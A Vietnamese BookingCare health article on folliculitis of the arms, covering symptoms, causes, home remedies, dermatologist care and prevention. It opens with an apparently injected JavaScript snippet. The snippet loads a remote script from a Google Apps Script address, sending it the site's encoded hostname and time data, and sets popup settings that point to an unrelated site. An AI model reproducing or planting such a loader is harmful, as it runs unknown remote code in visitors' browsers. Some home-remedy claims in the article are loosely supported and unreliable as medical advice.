var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Viêm nang lông ở tay – Triệu chứng, nguyên nhân và cách điều trị

Viêm nang lông ở tay (Nguồn: thuocdantoc.vn)

Viêm nang lông ở tay tuy không gây nguy hại cho sức khỏe nhưng viêm nang lông ở tay đeo bám người bệnh một cách dai dẳng, gây cảm giác ngứa ngáy, mất thẩm mỹ.

Vậy, khi nào cần thăm khám viêm nang lông tay? Hãy cùng BookingCare tìm hiểu về viêm nang lông ở tay để có thể điều trị dứt điểm.

Viêm nang lông ở tay là gì?

Viêm nang lông ở cánh tay là tình trạng viêm nhiễm xảy ra trên da ở khu vực hai cánh tay. Bệnh có thể khiến bạn cảm thấy ngứa ngáy, khi quan sát sẽ thấy các nốt sần sùi trên da.

Nếu không được phát hiện và điều trị kịp thời, tình trạng viêm nang lông ở tay có thể lây lan rộng, trở nên trầm trọng hơn, chuyển biến thành ổ gà hay đinh râu vừa gây ra những cảm giác khó chịu, bất tiện cho người bệnh vừa gây mất thẩm mĩ.

Triệu chứng nhận biết bị viêm nang lông ở tay

Người bệnh sẽ thấy các dấu hiệu viêm nang lông cánh tay hoặc viêm nang lông ở bắp tay hoặc cả hai vị trí này.

Cụ thể, các triệu chứng nhận biết bệnh viêm nang lông là:

  • Trên vùng da cánh tay xuất hiện nhiều nốt sần sùi có màu đỏ, gây ngứa ngáy
  • Sợi lông không thể mọc thẳng lên trên làn da mà cuộn tròn dưới da gây viêm chân lông ở cánh tay, viêm chân lông ở bắp tay, viêm chân lông ở tay
  • Viêm nang lông nghiệm trọng hơn có thể biến chuyển thành các nhọt, ổ gà, đinh râu
  • Khi viêm nang lông chuyển thành các mụn nước có mủ trắng ở đầu thì khi người bệnh sờ vào, các mụn nước này sẽ vỡ ra, đóng vẩy làm khô da.
Viêm nang lông ở cánh tay (Nguồn: Sức khỏe hàng ngày)

Ngay khi thấy các triệu chứng kể trên, bạn cần nghĩ ngay tới khả năng bị viêm nang lông và tìm cách điều trị hiệu quả.

Nguyên nhân gây viêm nang lông ở tay

Những nguyên nhân chính gây viêm nang lông ở tay bạn cần biết để phòng tránh:

  • Tuyến bã nhờn hoạt động quá mức
  • Cạo, nhổ lông ở tay không đúng cách
  • Sử dụng mỹ phẩm kém chất lượng
  • Mặc áo bó sát
  • Vệ sinh da không sạch sẽ
  • Môi trường ô nhiễm
  • Thời tiết nóng ẩm
  • Phương pháp điều trị viêm nang lông ở tay
  • Phòng tránh viêm nang lông ở tay

Cách điều trị viêm nang lông ở tay

Sau khi xác định được nguyên nhân gây bệnh và tình trạng bệnh, người bệnh sẽ áp dụng những phương pháp điều trị phù hợp.

Chăm sóc tại nhà

Nguyên liệu tự nhiênCông dụngCách sử dụng

Nha đam

Trong gel nha đam chứa các chất như axit salicylic, Magnesium lactate giúp đẩy lùi tình trạng viêm chân lông bằng cách sát khuẩn hiệu quả, giảm nhanh hiện tượng ngứa, tiêu viêm.

Cách sử dụng:

  • Nha đam đem rửa sạch, lột vỏ rồi thoa lên vùng da bị viêm nang lông.
  • Massage khoảng 20 phút rồi rửa lại với nước.
  • Thực hiện 2 lần/tuần để cải thiện tình trạng và có kết quả.

Trà xanh

Tiêu diệt vi khuẩn gây viêm trong các nang lông nhờ chứa EGCG dồi dào. Chất này hoạt động bằng cách chống oxy hóa, bảo vệ các tế bào trong các nang lông khỏi tác hại của những vi khuẩn.

Cách sử dụng:

  • Rửa lá trà đem ngâm nước muối pha loãng trong khoảng 15 phút.
  • Vớt lá trà ra cho ráo rồi đem vò nát.
  • Cho lá trà vào ấm chế nước sôi vào ủ 10 phút hoặc bạn nấu sẵn một nồi nước sôi rồi cho lá trà vào đun thêm vài phút nữa.
  • Lấy nước trà rửa vào những khu vực da bị viêm, có thể dùng bã xát nhẹ lên da để làm sạch bã nhờn.

Lá trầu không

Trong thành phần của lá trầu không chứa nhiều tinh dầu, có những chất như Havibetol, Methyl eugenol hay Chavicol… Có tác dụng chống oxy hóa, kháng khuẩn, tiêu sưng.

Cách thực hiện:

  • Giã nát lá trầu không rồi bọc vào trong một miếng vải mỏng.
  • Lấy bọc lá xát nhẹ lên khu vực da bị viêm.
  • Vệ sinh lại da với nước sạch sau 15 phút.

Bột yến mạch

Yến mạch chứa hàm lượng Zinc (kẽm) cao và chúng có khả năng sát trùng, giảm viêm hiệu quả. Bột yến mạch còn chứa avenanthramide – là chất chống oxy hóa có khả năng kháng viêm, bảo vệ da của ạn và giảm tình trạng ngứa ngáy.

Cách thực hiện:

  • Pha nước có nhiệt độ 37 độ C
  • Cho bột yến mạch vào nước và đợi trong khoảng từ 3 – 5 phút
  • Sử dụng nước yến mạch thoa lên vùng da bị viêm nang lông ở tay
  • Thư giãn trong khoảng 15 phút
  • Và cuối cùng làm sạch vùng da vừa thoa yến mạch với nước sạch

Thăm khám bác sĩ da liễu

Nếu bệnh không thuyên giảm và có dấu hiệu viêm nhiễm lan rộng hơn thì bệnh nhân nên đi khám với bác sĩ Da liễu để có phương án điều trị phù hợp. Tùy tình trạng viêm mà bác sĩ sẽ có phác độ điều trị khác nhau:

  • Sử dụng thuốc: Bác sĩ có thể kê đơn thuốc cho bệnh nhân gồm kem dưỡng da, kháng sinh để điều trị viêm nang lông dạng nhiễm trùng nhẹ. Trong trường hợp nhiễm trùng nặng, bệnh nhân nên sử dụng kháng sinh đường uống.
  • Tiểu phẫu: Nếu nốt nhọt quá to, bác sĩ sẽ thực hiện tiểu phẫu để loại bỏ mủ, giảm đau và giúp bạn mau phục hồi hơn
  • Công nghệ laser: Đây là phương pháp điều trị viêm nang lông bằng ánh sáng xung cường độ cao, những vùng da có lỗ chân lông to, xù xì sẽ được cải thiện rõ rệt. Với khả năng loại bỏ tế bào chết hiệu quả, trị viêm nang lông bằng laser sẽ giúp cho da sáng mịn hơn đồng thời kích thích collagen phát triển giúp bề mặt da trở nên săn chắc, đàn hồi, khỏe mạnh.

Nếu không có thời gian đến các phòng khám chuyên khoa bạn có thể đặt lịch khám với bác sĩ từ xa qua video. Với nền tảng của BookingCare, bạn có thể kết nối với bác sĩ trực tiếp mà không cần đến bệnh viện.

Cách phòng tránh viêm nang lông ở tay

Để phòng tránh tình trạng viêm nang lông, mọi người cần lưu ý:

  • Mặc quần áo vừa vặn, khô ráo, chất liệu mềm mại, thấm hút tốt
  • Lưu ý khi tẩy lông: Làm sạch da trước và sau khi tẩy lông, dùng khăn lau mát-xa hình tròn trước khi cạo, cạo theo hướng mọc của lông, dùng dao cạo riêng, sắc và sạch sẽ
  • Dùng riêng các vật dụng hàng ngày như khăn, quần áo, dao cạo
  • Vệ sinh toàn thân sạch sẽ, tắm rửa sạch sẽ hàng ngày, đặc biệt là sau khi vận động mạnh, ra mồ hôi
  • Không tự ý nặn mụn nhọt
  • Không sử dụng các sản phẩm khiến da đổ nhiều dầu vì dầu có thể gây bít tắc lỗ chân lông

Tạm kết

Hy vọng những kiến thức về căn bệnh viêm nang lông ở tay mà BookingCare cung cấp trên đây sẽ giúp bạn cải thiện đáng kể tình hình trên da. Cần lưu ý thêm, kết quả của các phương pháp trên còn tùy thuộc vào cơ địa của mỗi người và mỗi giai đoạn của bệnh.

Quan sát thấy tình trạng bệnh không tiến triển, hãy tìm đến bác sĩ chuyên khoa da liễu để được chữa trị kịp thời. Nếu bạn chưa có thời gian đến các cơ sở y tế để thăm khám thì có thể đặt lịch khám với các bác sĩ da liễu hàng đầu qua video tại BookingCare!